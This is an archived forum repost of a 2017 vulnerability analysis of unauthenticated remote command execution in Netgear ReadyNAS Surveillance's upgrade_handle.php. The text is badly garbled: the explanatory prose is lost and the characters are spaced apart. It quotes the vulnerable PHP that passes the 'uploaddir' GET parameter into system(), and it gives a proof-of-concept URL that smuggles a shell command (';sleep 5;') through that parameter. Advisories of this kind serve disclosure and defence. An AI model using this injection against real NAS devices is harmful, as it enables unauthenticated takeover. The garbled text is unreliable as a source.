搜索

[11851] 2017-10-02_美国网件ReadyNAS监控系统非认证远程命令执行漏洞分析

文档创建者:s7ckTeam
浏览次数:39
最后更新:2025-01-18
2017-10-02_美国网件ReadyNAS监控系统非认证远程命令执行漏洞分析 R e a d y N A S a n g 0 1 0 e l a   F r e e B u f   2 0 1 7 - 1 0 - 0 2 R e a d y N A S R e a d y N A S R e a d y N A S u p g r a d e _ h a n d l e . p h p { i f ( c o n s t a n t ( " N E E D _ U P L O A D _ F R O M _ D I S K " ) ) { i f ( i s s e t ( $ _ G E T [ ' u p l o a d d i r ' ] ) )     { $ u p l o a d d i r = $ _ G E T [ ' u p l o a d d i r ' ] ;     $ f p = f o p e n ( U P L O A D _ C O N F _ P A T H , ' w ' ) ;     $ s t r D a t a = " s e r v e r . u p l o a d - d i r s = ( " " . $ u p l o a d d i r . " " ) n " ;     f w r i t e ( $ f p , $ s t r D a t a ) ; f c l o s e ( $ f p ) ;     $ c u r r e n t _ d i r = s y s t e m ( ' c a t ' . P H P _ C I N F _ P A T H . ' | g r e p ' u p l o a d _ t m p _ d i r ' ' ) ;     $ t m p _ u p l o a d _ d i r = ' u p l o a d _ t m p _ d i r = ' . $ u p l o a d d i r ;     $ c m d = " s e d - i ' s / " . s t r _ r e p l a c e ( ' / ' , ' / ' , $ c u r r e n t _ d i r ) . " / " . s t r _ r e p l a c e ( ' / ' , ' / ' , $ t m p _ u p l o a d _ d i r ) . " / g ' " . P H P _ C I N F _ P A T H ;     / / s y s t e m ( " e c h o " $ u p l o a d d i r " > " . U P G R A D E _ D I R _ P A T H ) ;     $ f i l e = f o p e n ( U P G R A D E _ D I R _ P A T H , " w " ) ;     i f ( $ f i l e )     f w r i t e ( $ f i l e , " [ U P L O A D ] n " ) ;     f w r i t e ( $ f i l e , " u p l o a d _ d i r = " " . $ u p l o a d d i r . " " n " ) ; f c l o s e ( $ f i l e ) ;     h e a d e r ( " C o n t e n t - t y p e : a p p l i c a t i o n / x m l r n r n " ) ;     e c h o " M o d i f y u p l o a d d i r e c t o r y o k " ; $ _ G E T [ u p l o a d d i r ]   $ t m p _ u p l o a d _ d i r s y s t e m ( ) e l s e   i f (   0   = =   s t r c m p ( $ _ G E T [ ' c m d ' ] , ' w r i t e u p l o a d d i r ' )   ) ' ? c m d = w r i t e u p l o a d d i r & u p l o a d d i r = % 2 7 ; C O M M A N D _ T O _ E X E C U T E ; % 2 7 ' P o C h t t p : / / I P / u p g r a d e _ h a n d l e . p h p ? c m d = w r i t e u p l o a d d i r & u p l o a d d i r = % 2 7 ; s l e e p % 2 0 5 ; % 2 7 6 2 7 h t t p s : / / b l o g s . s e c u r i t e a m . c o m / i n d e x . p h p / a r c h i v e s / 3 4 0 9
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理